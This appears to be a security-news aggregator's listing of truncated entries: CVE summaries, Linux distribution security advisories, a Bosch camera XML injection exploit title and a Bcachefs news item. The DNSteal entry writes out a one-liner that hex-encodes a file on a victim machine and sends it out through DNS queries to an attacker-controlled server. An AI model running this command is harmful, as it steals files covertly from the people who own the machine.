Bosch Security Systems Dinion NBN-498 - Web Interface XML Injection
Bosch Security Systems Dinion NBN-498 - Web Interface XML Injection Exploit Title: Bosch Security Systems - XML Injection - Dinion NBN-498 Web Interface Date: 01/09/2015 Exploit Author: neom22 Vendor Homepage: http://us.boschsecurity.com Data Sheet:...
Bosch Security Systems Dinion NBN-498 Web Interface - XML Injection Vulnerability
Exploit for hardware platform in category web applications Exploit Title: Bosch Security Systems - XML Injection - Dinion NBN-498 Web Interface Date: 01/09/2015 Exploit Author: neom22 Vendor Homepage: http://us.boschsecurity.com Data Sheet:...
DNSteal - DNS Exfiltration tool for stealthily sending files over DNS requests
This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests. Below is an image showing an example of how to use: On the victim machine, you simply can do something like so: for b in $(xxd -p file/to/send.png); do dig @server $b.filename.com; done...
Amazon Linux: Security Advisory (ALAS-2013-171)
The remote host is missing an update for the SPDX-FileCopyrightText: 2015 Greenbone AG Some text descriptions might be excerpted from (a) referenced source(s), and are Copyright (C) by the respective right holder(s). SPDX-License-Identifier: GPL-2.0-only ifdescription...
CVE-2015-3966
The IPsec SA establishment process on Innominate mGuard devices with firmware 8.x before 8.1.7 allows remote authenticated users to cause a denial of service (VPN service restart) by leveraging a peer relationship to send a crafted configuration with compression...
ownCloud: demo.owncloud.org: HTTP compression is enabled potentially leading to BREACH attack
@pareshparmar reported the BREACH vulnerability on demo.owncloud.org. ownCloud has meanwhile disabled compression on the system. It should be noted that starting with ownCloud 8.2 the CSRF token is randomized for each request. As per request by the reporter this issue has only been disclosed...
Meet Linux's New Fastest File-System – Bcachefs
First announced over five years ago, ex-Google engineer Kent Overstreet is pleased to announce the general availability of a new open-source file-system for Linux, called the Bcache File System or Bcachefs. Bcachefs is a Linux kernel block layer cache that aims at offering a speedier and more...
[SECURITY] Fedora 23 Update: libpgf-6.14.12-4.fc23
libPGF contains an implementation of the Progressive Graphics File (PGF), which is a new image file format that is based on a discrete, fast wavelet transform with progressive coding features. PGF can be used for lossless and lossy compression...
[SECURITY] Fedora 21 Update: lighttpd-1.4.36-1.fc21
Secure, fast, compliant and very flexible web-server which has been optimized for high-performance environments. It has a very low memory footprint compared to other webservers and takes care of cpu-load. Its advanced feature-set FastCGI, CGI, Auth, Output-Compression, URL-Rewriting and many mo...
Moderate: Red Hat Security Advisory: sudo security, bug fix, and enhancement update
Updated sudo packages that fix one security issue, three bugs, and add one enhancement are now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having Moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed...
[SECURITY] Fedora 21 Update: s3ql-2.13-1.fc21
S3QL is a file system that stores all its data online using storage services like Google Storage, Amazon S3 or OpenStack. S3QL effectively provides a hard disk of dynamic, infinite capacity that can be accessed from any computer with Internet access. S3QL is a standard conforming, full featured...
[SECURITY] Fedora 22 Update: s3ql-2.13-1.fc22
S3QL is a file system that stores all its data online using storage services like Google Storage, Amazon S3 or OpenStack. S3QL effectively provides a hard disk of dynamic, infinite capacity that can be accessed from any computer with Internet access. S3QL is a standard conforming, full featured...
CVE-2015-3677
The LZVN compression feature in AppleFSCompression in Apple OS X before 10.10.4 allows attackers to obtain sensitive memory-layout information for the kernel via a crafted app...
Design/Logic Flaw
The LZVN compression feature in AppleFSCompression in Apple OS X before 10.10.4 allows attackers to obtain sensitive memory-layout information for the kernel via a crafted app...
CVE-2015-3677
CVE-2015-3677 affects Apple OS X prior to 10.10.4, specifically the LZVN compression feature in AppleFSCompression. The vulnerability allows a crafted app to disclose kernel memory layout, a memory-disclosure issue in LZVN processing. The underlying impact is partial leakage of kernel memory layo...
Apple MAC OS X LZVN Compression Memory Leak Vulnerability
Apple Mac OS X is a commercial operating system. A security vulnerability in Apple Mac OS X LZVN compression handling allows an attacker to run a malicious application to obtain memory layout information...
Apple OS X NTFS Compression Block Information Disclosure Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple OS X. User interaction is required to exploit this vulnerability in that the target must open a malicious file. The specific flaw exists within the handling of NTFS file systems. The issue li...
Medium: python27
Issue Overview: It was discovered that multiple Python standard library modules implementing network protocols such as httplib or smtplib failed to restrict sizes of server responses. A malicious server could cause a client using one of the affected modules to consume an excessive amount of...
[SECURITY] Fedora 20 Update: ntfs-3g-2015.3.14-2.fc20
NTFS-3G is a stable, open source, GPL licensed, POSIX, read/write NTFS driver for Linux and many other operating systems. It provides safe handling of the Windows XP, Windows Server 2003, Windows 2000, Windows Vista, Windows Server 2008 and Windows 7 NTFS file systems. NTFS-3G can create, remove,...